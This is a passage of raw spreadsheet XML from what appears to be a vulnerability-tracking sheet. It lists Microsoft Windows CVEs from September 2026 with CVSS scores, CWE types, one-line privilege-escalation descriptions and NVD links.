t="inlineStr"><is><t>CWE-416</t></is></c><c r="S937" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T937" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t></is></c></row><row r="938"><c r="A938" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B938" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C938" s="5" t="inlineStr"><is><t>CVE-2026-69488</t></is></c><c r="D938" s="5" t="n"><v>7</v></c><c r="E938" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F938" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G938" s="5" t="inlineStr" /><c r="H938" s="5" t="n"><v>0.003</v></c><c r="I938" s="5" t="inlineStr" /><c r="J938" s="5" t="inlineStr" /><c r="K938" s="5" t="inlineStr" /><c r="L938" s="5" t="inlineStr" /><c r="M938" s="5" t="inlineStr" /><c r="N938" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O938" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P938" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q938" s="5" t="inlineStr" /><c r="R938" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S938" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T938" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t></is></c></row><row r="939"><c r="A939" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B939" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C939" s="5" t="inlineStr"><is><t>CVE-2026-69492</t></is></c><c r="D939" s="5" t="n"><v>7</v></c><c r="E939" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F939" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G939" s="5" t="inlineStr" /><c r="H939" s="5" t="n"><v>0.003</v></c><c r="I939" s="5" t="inlineStr" /><c r="J939" s="5" t="inlineStr" /><c r="K939" s="5" t="inlineStr" /><c r="L939" s="5" t="inlineStr" /><c r="M939" s="5" t="inlineStr" /><c r="N939" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O939" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P939" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q939" s="5" t="inlineStr" /><c r="R939" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S939" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T939" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t></is></c></row><row r="940"><c r="A940" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B940" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C940" s="5" t="inlineStr"><is><t>CVE-2026-69498</t></is></c><c r="D940" s="5" t="n"><v>7</v></c><c r="E940" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F940" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G940" s="5" t="inlineStr" /><c r="H940" s="5" t="n"><v>0.003</v></c><c r="I940" s="5" t="inlineStr" /><c r="J940" s="5" t="inlineStr" /><c r="K940" s="5" t="inlineStr" /><c r="L940" s="5" t="inlineStr" /><c r="M940" s="5" t="inlineStr" /><c r="N940" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O940" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P940" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q940" s="5" t="inlineStr" /><c r="R940" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S940" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T940" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t></is></c></row><row r="941"><c r="A941" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B941" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C941" s="5" t="inlineStr"><is><t>CVE-2026-69500</t></is></c><c r="D941" s="5" t="n"><v>7</v></c><c r="E941" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F941" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G941" s="5" t="inlineStr" /><c r="H941" s="5" t="n"><v>0.003</v></c><c r="I941" s="5" t="inlineStr" /><c r="J941" s="5" t="inlineStr" /><c r="K941" s="5" t="inlineStr" /><c r="L941" s="5" t="inlineStr" /><c r="M941" s="5" t="inlineStr" /><c r="N941" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O941" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P941" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q941" s="5" t="inlineStr" /><c r="R941" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S941" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T941" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t></is></c></row><row r="942"><c r="A942" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B942" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C942" s="5" t="inlineStr"><is><t>CVE-2026-69501</t></is></c><c r="D942" s="5" t="n"><v>7</v></c><c r="E942" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F942" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G942" s="5" t="inlineStr" /><c r="H942" s="5" t="n"><v>0.002</v></c><c r="I942" s="5" t="inlineStr" /><c r="J942" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K942" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L942" s="5" t="inlineStr" /><c r="M942" s="5" t="inlineStr" /><c r="N942" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O942" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P942" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q942" s="5" t="inlineStr" /><c r="R942" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S942" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T942" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t></is></c></row><row r="943"><c r="A943" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B943" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C943" s="5" t="inlineStr"><is><t>CVE-2026-69516</t></is></c><c r="D943" s="5" t="n"><v>7</v></c><c r="E943" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F943" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G943" s="5" t="inlineStr" /><c r="H943" s="5" t="n"><v>0.002</v></c><c r="I943" s="5" t="inlineStr" /><c r="J943" s="5" t="inlineStr" /><c r="K943" s="5" t="inlineStr" /><c r="L943" s="5" t="inlineStr" /><c r="M943" s="5" t="inlineStr" /><c r="N943" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O943" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P943" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q943" s="5" t="inlineStr" /><c r="R943" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S943" s="5" t="inlineStr"><is><t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T943" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t></is></c></row><row r="944"><c r="A944" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B944" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C944" s="5" t="inlineStr"><is><t>CVE-2026-69517</t></is></c><c r="D944" s="5" t="n"><v>7</v></c><c r="E944" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F944" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G944" s="5" t="inlineStr" /><c r="H944" s="5" t="n"><v>0.003</v></c><c r="I944" s="5" t="inlineStr" /><c r="J944" s="5" t="inlineStr" /><c r="K944" s="5" t="inlineStr" /><c r="L944" s="5" t="inlineStr" /><c r="M944" s="5" t="inlineStr" /><c r="N944" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O944" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P944" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q944" s="5" t="inlineStr" /><c r="R944" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S944" s="5" t="inlineStr"><is><t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T944" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t></is></c></row><row r="945"><c r="A945" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B945" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C945" s="5" t="inlineStr"><is><t>CVE-2026-69540</t></is></c><c r="D945" s="5" t="n"><v>7</v></c><c r="E945" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F945" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G945" s="5" t="inlineStr" /><c r="H945" s="5" t="n"><v>0.003</v></c><c r="I945" s="5" t="inlineStr" /><c r="J945" s="5" t="inlineStr" /><c r="K945" s="5" t="inlineStr" /><c r="L945" s="5" t="inlineStr" /><c r="M945" s="5" t="inlineStr" /><c r="N945" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O945" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P945" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q945" s="5" t="inlineStr" /><c r="R945" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S945" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T945" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t></is></c></row><row r="946"><c r="A946" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B946" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C946" s="5" t="inlineStr"><is><t>CVE-2026-69549</t></is></c><c r="D946" s="5" t="n"><v>7</v></c><c r="E946" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F946" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G946" s="5" t="inlineStr" /><c r="H946" s="5" t="n"><v>0.003</v></c><c r="I946" s="5" t="inlineStr" /><c r="J946" s="5" t="inlineStr" /><c r="K946" s="5" t="inlineStr" /><c r="L946" s="5" t="inlineStr" /><c r="M946" s="5" t="inlineStr" /><c r="N946" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O946" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P946" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q946" s="5" t="inlineStr" /><c r="R946" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="S946" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T946" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t></is></c></row><row r="947"><c r="A947" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B947" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C947" s="5" t="inlineStr"><is><t>CVE-2026-69560</t></is></c><c r="D947" s="5" t="n"><v>7</v></c><c r="E947" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F947" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G947" s="5" t="inlineStr" /><c r="H947" s="5" t="n"><v>0.003</v></c><c r="I947" s="5" t="inlineStr" /><c r="J947" s="5" t="inlineStr" /><c r="K947" s="5" t="inlineStr" /><c r="L947" s="5" t="inlineStr" /><c r="M947" s="5" t="inlineStr" /><c r="N947" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O947" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P947" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q947" s="5" t="inlineStr" /><c r="R947" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S947" s="5" t="inlineStr"><is><t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T947" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t></is></c></row><row r="948"><c r="A948" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B948" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C948" s="5" t="inlineStr"><is><t>CVE-2026-69563</t></is></c><c r="D948" s="5" t="n"><v>7</v></c><c r="E948" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F948" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G948" s="5" t="inlineStr" /><c r="H948" s="5" t="n"><v>0.002</v></c><c r="I948" s="5" t="inlineStr" /><c r="J948" s="5" t="inlineStr" /><c r="K948" s="5" t="inlineStr" /><c r="L948" s="5" t="inlineStr" /><c r="M948" s="5" t="inlineStr" /><c r="N948" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O948" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P948" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q948" s="5" t="inlineStr" /><c r="R948" s="5" t="inlineStr"><is><t>CWE-122, CWE-367</t></is></c><c r="S948" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T948" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t></is></c></row><row r="949"><c r="A949" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B949" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C949" s="5" t="inlineStr"><is><t>CVE-2026-69564</t></is></c><c r="D949" s="5" t="n"><v>7</v></c><c r="E949" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F949" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G949" s="5" t="inlineStr" /><c r="H949" s="5" t="n"><v>0.003</v></c><c r="I949" s="5" t="inlineStr" /><c r="J949" s="5" t="inlineStr" /><c r="K949" s="5" t="inlineStr" /><c r="L949" s="5" t="inlineStr" /><c r="M949" s="5" t="inlineStr" /><c r="N949" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O949" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P949" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q949" s="5" t="inlineStr" /><c r="R949" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S949" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T949" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t></is></c></row><row r="950"><c r="A950" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B950" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C950" s="5" t="inlineStr"><is><t>CVE-2026-69567</t></is></c><c r="D950" s="5" t="n"><v>7</v></c><c r="E950" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F950" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G950" s="5" t="inlineStr" /><c r="H950" s="5" t="n"><v>0.002</v></c><c r="I950" s="5" t="inlineStr" /><c r="J950" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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50" s="5" t="inlineStr" /><c r="M950" s="5" t="inlineStr" /><c r="N950" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O950" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P950" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q950" s="5" t="inlineStr" /><c r="R950" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S950" s="5" t="inlineStr"><is><t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T950" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t></is></c></row><row r="951"><c r="A951" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B951" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C951" s="5" t="inlineStr"><is><t>CVE-2026-69573</t></is></c><c r="D951" s="5" t="n"><v>7</v></c><c r="E951" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F951" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G951" s="5" t="inlineStr" /><c r="H951" s="5" t="n"><v>0.003</v></c><c r="I951" s="5" t="inlineStr" /><c r="J951" s="5" t="inlineStr" /><c r="K951" s="5" t="inlineStr" /><c r="L951" s="5" t="inlineStr" /><c r="M951" s="5" t="inlineStr" /><c r="N951" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O951" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P951" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q951" s="5" t="inlineStr" /><c r="R951" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S951" s="5" t="inlineStr"><is><t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T951" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t></is></c></row><row r="952"><c r="A952" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B952" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C952" s="5" t="inlineStr"><is><t>CVE-2026-69574</t></is></c><c r="D952" s="5" t="n"><v>7</v></c><c r="E952" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F952" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G952" s="5" t="inlineStr" /><c r="H952" s="5" t="n"><v>0.003</v></c><c r="I952" s="5" t="inlineStr" /><c r="J952" s="5" t="inlineStr" /><c r="K952" s="5" t="inlineStr" /><c r="L952" s="5" t="inlineStr" /><c r="M952" s="5" t="inlineStr" /><c r="N952" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q952" s="5" t="inlineStr" /><c r="R952" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S952" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T952" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t></is></c></row><row r="953"><c r="A953" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B953" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C953" s="5" t="inlineStr"><is><t>CVE-2026-69575</t></is></c><c r="D953" s="5" t="n"><v>7</v></c><c r="E953" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F953" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G953" s="5" t="inlineStr" /><c r="H953" s="5" t="n"><v>0.003</v></c><c r="I953" s="5" t="inlineStr" /><c r="J953" s="5" t="inlineStr" /><c r="K953" s="5" t="inlineStr" /><c r="L953" s="5" t="inlineStr" /><c r="M953" s="5" t="inlineStr" /><c r="N953" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O953" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P953" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q953" s="5" t="inlineStr" /><c r="R953" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S953" s="5" t="inlineStr"><is><t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T953" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t></is></c></row><row r="954"><c r="A954" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B954" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C954" s="5" t="inlineStr"><is><t>CVE-2026-69578</t></is></c><c r="D954" s="5" t="n"><v>7</v></c><c r="E954" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F954" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G954" s="5" t="inlineStr" /><c r="H954" s="5" t="n"><v>0.002</v></c><c r="I954" s="5" t="inlineStr" /><c r="J954" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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54" s="5" t="inlineStr" /><c r="M954" s="5" t="inlineStr" /><c r="N954" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O954" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P954" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q954" s="5" t="inlineStr" /><c r="R954" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S954" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T954" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t></is></c></row><row r="955"><c r="A955" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B955" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C955" s="5" t="inlineStr"><is><t>CVE-2026-69581</t></is></c><c r="D955" s="5" t="n"><v>7</v></c><c r="E955" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F955" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G955" s="5" t="inlineStr" /><c r="H955" s="5" t="n"><v>0.002</v></c><c r="I955" s="5" t="inlineStr" /><c r="J955" s="5" t="inlineStr" /><c r="K955" s="5" t="inlineStr" /><c r="L955" s="5" t="inlineStr" /><c r="M955" s="5" t="inlineStr" /><c r="N955" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O955" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P955" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q955" s="5" t="inlineStr" /><c r="R955" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S955" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T955" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t></is></c></row><row r="956"><c r="A956" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B956" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C956" s="5" t="inlineStr"><is><t>CVE-2026-69600</t></is></c><c r="D956" s="5" t="n"><v>7</v></c><c r="E956" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F956" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G956" s="5" t="inlineStr" /><c r="H956" s="5" t="n"><v>0.003</v></c><c r="I956" s="5" t="inlineStr" /><c r="J956" s="5" t="inlineStr" /><c r="K956" s="5" t="inlineStr" /><c r="L956" s="5" t="inlineStr" /><c r="M956" s="5" t="inlineStr" /><c r="N956" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O956" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P956" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q956" s="5" t="inlineStr" /><c r="R956" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S956" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T956" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t></is></c></row><row r="957"><c r="A957" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B957" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C957" s="5" t="inlineStr"><is><t>CVE-2026-69605</t></is></c><c r="D957" s="5" t="n"><v>7</v></c><c r="E957" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F957" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G957" s="5" t="inlineStr" /><c r="H957" s="5" t="n"><v>0.003</v></c><c r="I957" s="5" t="inlineStr" /><c r="J957" s="5" t="inlineStr" /><c r="K957" s="5" t="inlineStr" /><c r="L957" s="5" t="inlineStr" /><c r="M957" s="5" t="inlineStr" /><c r="N957" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O957" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P957" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q957" s="5" t="inlineStr" /><c r="R957" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S957" s="5" t="inlineStr"><is><t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T957" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t></is></c></row><row r="958"><c r="A958" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B958" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C958" s="5" t="inlineStr"><is><t>CVE-2026-69606</t></is></c><c r="D958" s="5" t="n"><v>7</v></c><c r="E958" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F958" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G958" s="5" t="inlineStr" /><c r="H958" s="5" t="n"><v>0.003</v></c><c r="I958" s="5" t="inlineStr" /><c r="J958" s="5" t="inlineStr" /><c r="K958" s="5" t="inlineStr" /><c r="L958" s="5" t="inlineStr" /><c r="M958" s="5" t="inlineStr" /><c r="N958" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O958" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P958" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q958" s="5" t="inlineStr" /><c r="R958" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S958" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T958" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t></is></c></row><row r="959"><c r="A959" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B959" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C959" s="5" t="inlineStr"><is><t>CVE-2026-69610</t></is></c><c r="D959" s="5" t="n"><v>7</v></c><c r="E959" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F959" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G959" s="5" t="inlineStr" /><c r="H959" s="5" t="n"><v>0.003</v></c><c r="I959" s="5" t="inlineStr" /><c r="J959" s="5" t="inlineStr" /><c r="K959" s="5" t="inlineStr" /><c r="L959" s="5" t="inlineStr" /><c r="M959" s="5" t="inlineStr" /><c r="N959" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O959" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P959" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q959" s="5" t="inlineStr" /><c r="R959" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S959" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T959" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t></is></c></row><row r="960"><c r="A960" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B960" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C960" s="5" t="inlineStr"><is><t>CVE-2026-69611</t></is></c><c r="D960" s="5" t="n"><v>7</v></c><c r="E960" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F960" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G960" s="5" t="inlineStr" /><c r="H960" s="5" t="n"><v>0.003</v></c><c r="I960" s="5" t="inlineStr" /><c r="J960" s="5" t="inlineStr" /><c r="K960" s="5" t="inlineStr" /><c r="L960" s="5" t="inlineStr" /><c r="M960" s="5" t="inlineStr" /><c r="N960" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O960" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P960" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q960" s="5" t="inlineStr" /><c r="R960" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S960" s="5" t="inlineStr"><is><t>Use after free in Virtual Hard Disk 